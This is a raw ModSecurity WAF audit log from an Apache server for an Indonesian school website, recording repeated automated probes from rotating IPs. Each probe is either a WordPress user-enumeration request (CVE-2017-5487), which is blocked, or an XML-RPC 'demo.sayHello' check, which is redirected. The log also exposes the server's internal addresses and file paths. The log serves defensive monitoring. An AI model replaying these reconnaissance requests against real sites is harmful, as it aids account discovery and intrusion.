"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497349895208 2378 (- - -) Stopwatch2: 1747497349895208 2378; combined=1035, p1=359, p2=652, p3=0, p4=0, p5=24, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e76d113-Z-- --71837f03-A-- [17/May/2025:22:56:12 +0700] aCixnBKi5m5upc8uMd4ZTQAAANE 103.236.140.4 46176 103.236.140.4 8181 --71837f03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71837f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71837f03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497372137768 2475 (- - -) Stopwatch2: 1747497372137768 2475; combined=1150, p1=385, p2=739, p3=0, p4=0, p5=26, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71837f03-Z-- --e9aa0466-A-- [17/May/2025:22:56:17 +0700] aCixoXyxdQCiyU1ENFejGQAAABA 103.236.140.4 46408 103.236.140.4 8181 --e9aa0466-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e9aa0466-C-- demo.sayHello --e9aa0466-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9aa0466-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497377721277 5467 (- - -) Stopwatch2: 1747497377721277 5467; combined=4244, p1=568, p2=3359, p3=36, p4=38, p5=135, sr=75, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9aa0466-Z-- --320f4463-A-- [17/May/2025:22:56:51 +0700] aCixwxKi5m5upc8uMd4aFgAAANI 103.236.140.4 48150 103.236.140.4 8181 --320f4463-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --320f4463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --320f4463-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497411804379 2859 (- - -) Stopwatch2: 1747497411804379 2859; combined=1211, p1=404, p2=781, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --320f4463-Z-- --4d106773-A-- [17/May/2025:22:56:58 +0700] aCixyum4kjNN-hEbWjKjYQAAAEo 103.236.140.4 48496 103.236.140.4 8181 --4d106773-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d106773-C-- demo.sayHello --4d106773-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d106773-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497418600910 7356 (- - -) Stopwatch2: 1747497418600910 7356; combined=5609, p1=754, p2=4578, p3=50, p4=67, p5=97, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d106773-Z-- --a46e4629-A-- [17/May/2025:22:57:17 +0700] aCix3QTOsBn9MSWb6WLURgAAAIk 103.236.140.4 49374 103.236.140.4 8181 --a46e4629-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a46e4629-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a46e4629-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497437007998 2846 (- - -) Stopwatch2: 1747497437007998 2846; combined=1317, p1=437, p2=848, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a46e4629-Z-- --4ef91f5d-A-- [17/May/2025:22:57:26 +0700] aCix5nyxdQCiyU1ENFekmgAAAAc 103.236.140.4 49762 103.236.140.4 8181 --4ef91f5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ef91f5d-C-- demo.sayHello --4ef91f5d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ef91f5d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497446621041 7108 (- - -) Stopwatch2: 1747497446621041 7108; combined=5464, p1=747, p2=4455, p3=52, p4=68, p5=86, sr=73, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ef91f5d-Z-- --ce433b54-A-- [17/May/2025:23:00:23 +0700] aCiyl-m4kjNN-hEbWjKnQAAAAFM 103.236.140.4 57046 103.236.140.4 8181 --ce433b54-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce433b54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce433b54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497623131251 2305 (- - -) Stopwatch2: 1747497623131251 2305; combined=1052, p1=340, p2=685, p3=0, p4=0, p5=27, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce433b54-Z-- --71ceb76c-A-- [17/May/2025:23:00:28 +0700] aCiynOm4kjNN-hEbWjKnVgAAAEo 103.236.140.4 57298 103.236.140.4 8181 --71ceb76c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71ceb76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71ceb76c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497628433234 2626 (- - -) Stopwatch2: 1747497628433234 2626; combined=1374, p1=440, p2=899, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71ceb76c-Z-- --fada612d-A-- [17/May/2025:23:00:28 +0700] aCiynATOsBn9MSWb6WLZbgAAAII 103.236.140.4 57304 103.236.140.4 8181 --fada612d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.252 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fada612d-C-- demo.sayHello --fada612d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fada612d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497628513482 5433 (- - -) Stopwatch2: 1747497628513482 5433; combined=4034, p1=549, p2=3309, p3=37, p4=32, p5=66, sr=60, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fada612d-Z-- --395ac440-A-- [17/May/2025:23:00:36 +0700] aCiypATOsBn9MSWb6WLZygAAAIM 103.236.140.4 57700 103.236.140.4 8181 --395ac440-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --395ac440-C-- demo.sayHello --395ac440-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --395ac440-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497636776944 5333 (- - -) Stopwatch2: 1747497636776944 5333; combined=4030, p1=542, p2=3270, p3=40, p4=32, p5=86, sr=56, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --395ac440-Z-- --282eee58-A-- [17/May/2025:23:01:14 +0700] aCiyyum4kjNN-hEbWjKoDgAAAEE 103.236.140.4 59348 103.236.140.4 8181 --282eee58-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --282eee58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --282eee58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497674620598 2518 (- - -) Stopwatch2: 1747497674620598 2518; combined=1089, p1=357, p2=709, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --282eee58-Z-- --475f066e-A-- [17/May/2025:23:01:21 +0700] aCiy0RKi5m5upc8uMd4fNwAAANQ 103.236.140.4 59632 103.236.140.4 8181 --475f066e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --475f066e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --475f066e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497681631851 2473 (- - -) Stopwatch2: 1747497681631851 2473; combined=1324, p1=448, p2=836, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --475f066e-Z-- --c030ba21-A-- [17/May/2025:23:01:26 +0700] aCiy1um4kjNN-hEbWjKoLAAAAEU 103.236.140.4 59906 103.236.140.4 8181 --c030ba21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c030ba21-C-- demo.sayHello --c030ba21-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c030ba21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497686572908 5363 (- - -) Stopwatch2: 1747497686572908 5363; combined=4048, p1=561, p2=3278, p3=36, p4=38, p5=81, sr=62, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c030ba21-Z-- --03fb8e7e-A-- [17/May/2025:23:01:26 +0700] aCiy1hKi5m5upc8uMd4fXQAAANQ 103.236.140.4 59924 103.236.140.4 8181 --03fb8e7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --03fb8e7e-C-- demo.sayHello --03fb8e7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --03fb8e7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497686898512 7808 (- - -) Stopwatch2: 1747497686898512 7808; combined=5984, p1=896, p2=4799, p3=50, p4=69, p5=108, sr=85, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03fb8e7e-Z-- --f123fc5b-A-- [17/May/2025:23:02:10 +0700] aCizAhKi5m5upc8uMd4gegAAAMo 103.236.140.4 33686 103.236.140.4 8181 --f123fc5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f123fc5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f123fc5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497730120313 3878 (- - -) Stopwatch2: 1747497730120313 3878; combined=2191, p1=646, p2=1492, p3=0, p4=0, p5=52, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f123fc5b-Z-- --afdc0830-A-- [17/May/2025:23:02:17 +0700] aCizCem4kjNN-hEbWjKpDwAAAFE 103.236.140.4 34042 103.236.140.4 8181 --afdc0830-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afdc0830-C-- demo.sayHello --afdc0830-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afdc0830-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497737873059 5180 (- - -) Stopwatch2: 1747497737873059 5180; combined=3977, p1=533, p2=3218, p3=37, p4=39, p5=88, sr=112, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
